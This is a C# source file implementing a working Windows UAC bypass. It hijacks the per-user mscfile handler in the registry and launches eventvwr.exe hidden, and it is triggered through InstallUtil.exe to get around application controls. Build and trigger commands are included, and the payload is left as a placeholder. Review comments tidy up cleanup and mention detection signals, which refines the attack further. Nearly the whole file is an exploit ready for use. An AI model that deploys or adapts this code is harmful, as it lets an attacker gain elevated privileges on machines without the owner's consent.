using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of the Event Viewer UAC bypass. Replace the literal "<PAYLOAD>" placeholder in Unlocker.Exec before compiling; as written, the hijacked handler would point at a command named "<PAYLOAD>".
Credits:
- @subTee for InstallUtil technique
- @enigma0x3 for Event Viewer UAC bypass
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Build:   C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe EventVwrBypass.cs
Trigger: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U EventVwrBypass.exe
(the /U switch runs Sample.Uninstall, which calls Unlocker.Exec; the Main entry point only prints a line)
*/
[System.ComponentModel.RunInstaller(true)]
public class Sample : Installer {
    /// <summary>
    /// Reached through "InstallUtil.exe /U"; the installer lifecycle is only the
    /// trigger for Unlocker.Exec. The supplied installer state is not read.
    /// NOTE(review): base.Uninstall(savedState) is not called here — confirm that
    /// nothing relies on the Installer base class's bookkeeping.
    /// </summary>
    /// <param name="savedState">Installer state passed by InstallUtil; unused.</param>
    public override void Uninstall(System.Collections.IDictionary savedState) {
        Console.WriteLine("Hello There From Uninstall");
        Unlocker.Exec();
    }
}
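public class Unlocker {
    // Per-user handler that eventvwr.exe resolves (see the linked write-up); its
    // default value is the command line that ends up being executed.
    private const string CommandKeyPath = @"Software\Classes\mscfile\shell\open\command";
    private const string EventViewerPath = @"C:\Windows\System32\eventvwr.exe";
    // How long eventvwr.exe is given before it is terminated.
    private const int EventViewerWaitMs = 5000;

    /// <summary>
    /// Entry point used only when the assembly is executed directly; it just
    /// prints a line. The real work is reached via Sample.Uninstall
    /// (InstallUtil.exe /U), which calls Exec().
    /// </summary>
    public static void Main() {
        Console.WriteLine("Hello from Main");
    }

    /// <summary>
    /// Writes the HKCU mscfile handler hijack, launches eventvwr.exe hidden so
    /// that it resolves that handler, waits, terminates it, and removes the
    /// hijack again.
    /// </summary>
    /// <remarks>
    /// The handler's default value is the literal placeholder "&lt;PAYLOAD&gt;",
    /// which must be replaced before compiling.
    /// Cleanup now runs in a finally block and tolerates a missing key, so a
    /// failed SetValue or Process.Start no longer leaves the hijacked handler
    /// behind in HKCU. Cleanup deletes the whole HKCU\Software\Classes\mscfile
    /// tree, including any pre-existing per-user mscfile association, exactly
    /// as the original did.
    /// NOTE(review): the write under HKCU\Software\Classes\mscfile\shell\open\command
    /// and an eventvwr.exe launch from an InstallUtil.exe parent are both
    /// well-known telemetry signals; and the technique assumes the target's
    /// eventvwr.exe still honors the per-user handler — confirm on the target
    /// build rather than assuming.
    /// </remarks>
    public static void Exec() {
        try {
            // RegistryKey is IDisposable; the original Close() is equivalent.
            using (RegistryKey command = Registry.CurrentUser.CreateSubKey(CommandKeyPath, true)) {
                command.SetValue("", "<PAYLOAD>", RegistryValueKind.String);
            }
            Console.WriteLine("Key has been created");
            RunEventViewer();
        }
        finally {
            Console.WriteLine("Cleaning up...");
            RemoveHandlerHijack();
        }
        Console.WriteLine("Complete");
    }

    // Starts eventvwr.exe hidden, gives it EventViewerWaitMs to resolve the
    // handler, then terminates it. The Process handle is disposed either way.
    private static void RunEventViewer() {
        using (System.Diagnostics.Process viewer = new System.Diagnostics.Process()) {
            viewer.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
            viewer.StartInfo.FileName = EventViewerPath;
            viewer.Start();
            Console.WriteLine("Event Viewer is starting up");
            System.Threading.Thread.Sleep(EventViewerWaitMs);
            try {
                viewer.Kill();
                Console.WriteLine("Killing Event Viewer");
            }
            catch (InvalidOperationException) {
                // Process.Kill throws this when the process has already exited.
                Console.WriteLine("Event Viewer no longer running");
            }
            catch (System.ComponentModel.Win32Exception) {
                // Termination itself failed; this is best-effort and cleanup
                // still runs in the caller's finally block.
                Console.WriteLine("Event Viewer could not be terminated");
            }
        }
    }

    // Deletes the HKCU mscfile tree written by Exec. Tolerates the tree being
    // absent (for example when CreateSubKey failed) so that cleanup never
    // masks the original exception with a second one.
    private static void RemoveHandlerHijack() {
        using (RegistryKey classes = Registry.CurrentUser.OpenSubKey(@"Software\Classes", true)) {
            if (classes != null) {
                classes.DeleteSubKeyTree("mscfile", false);
            }
        }
    }
}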